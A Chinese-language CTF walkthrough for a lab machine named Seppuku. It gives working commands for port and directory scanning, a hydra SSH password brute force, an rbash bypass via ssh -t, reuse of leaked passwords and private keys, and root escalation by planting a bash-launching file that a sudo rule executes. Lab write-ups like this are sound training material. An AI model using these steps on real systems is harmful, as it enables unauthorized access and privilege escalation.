nmap扫描 ---- gobuster扫描网站目录 ---- hydra爆破ssh密码 ---- ssh -t绕过rbash ---- 密码泄露切换到samurai,发现可以sudo提权,但提权用的命令不存在 ---- tanto用户私钥ssh登录,创建提权所需命令文件 ---- samurai用户sudo提权
环境信息:靶机:192.168.101.86
攻击机:192.168.101.34
具体步骤: 1、nmap扫描sudo nmap -sV -sC -p- 192.168.101.86扫出来一堆端口,其中80、7080、7601、8088都是http或者https
用gobuster扫描80、7080、7601、8088端口,只有7601端口扫描出有意义的目录(只有/w,/production,/keys,/secret下面有东西)
gobuster dir -u http://192.168.101.86:7601 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
http://192.168.101.86:7601/w和http://192.168.101.86:7601/secret/下都有password.lst文件,是同一个密码字典,保存下来(以防万一不是同一个,我用的是http://192.168.101.86:7601/secret/password.lst)
http://192.168.101.86:7601/secret/下的passwd.bak和shadow.bak都是兔子洞
http://192.168.101.86:7601/keys/下面两个私钥虽然不是兔子洞,不过暂时没用,先留着备用
真正的系统用户名在http://192.168.101.86:7601/secret/hostname里面
seppuku
用hydra爆破seppuku用户的ssh密码,密码字典来自http://192.168.101.86:7601/secret/password.lst
hydra -l seppuku -P "/home/kali/Downloads/password.lst" ssh://192.168.101.86得到seppuku的密码eeyoree
ssh登录成功
ssh seppuku@192.168.101.86
seppuku用户ssh登录之后发现是rbash,不能切换目录
退出ssh登录,重新用如下命令登录
ssh seppuku@192.168.101.86 -t 'bash --noprofile'成功绕过rbash
在seppuku的家目录下(/home/seppuku)发现一个.passwd文件,文件的属主是root,文件内容是
12345685213456!@!@A
目录切换到/home,发现另外两个用户的家目录
尝试以12345685213456!@!@A为密码,分别切换到用户root、samurai、tanto,只有samurai切换成功
su - samurai切换成功后,查看samurai可以sudo执行什么命令
sudo -l发现samurai可以以任何用户身份执行/home/tanto/.cgi_bin/bin /tmp/*
来到目录/home/tanto下,发现并没有.cgi_bin文件夹,而又只有tanto用户可以在自己的家目录下创建文件夹和文件,所以还得想办法用tanto用户登录。
(2)tanto用户私钥ssh登录,构造提权条件这时想起来http://192.168.101.86:7601/keys/下还有两个私钥文件,我下载了private.bak,重命名为private,并用它作为tanto的私钥进行ssh登录,用-t参数绕过rbash
ssh tanto@192.168.101.86 -i private -t 'bash --noprofile'
输入如下命令创建/home/tanto/.cgi_bin/bin,使其内容为/bin/bash,并赋予可执行权限
tanto@seppuku:~$ mkdir .cgi_bin
tanto@seppuku:~$ cd .cgi_bin
tanto@seppuku:~/.cgi_bin$ echo '/bin/bash' > bin
tanto@seppuku:~/.cgi_bin$ chmod +x binsamurai的shell中执行如下命令,sudo提权到root,并在/root文件夹下找到root.txt
sudo /home/tanto/.cgi_bin/bin /tmp/*
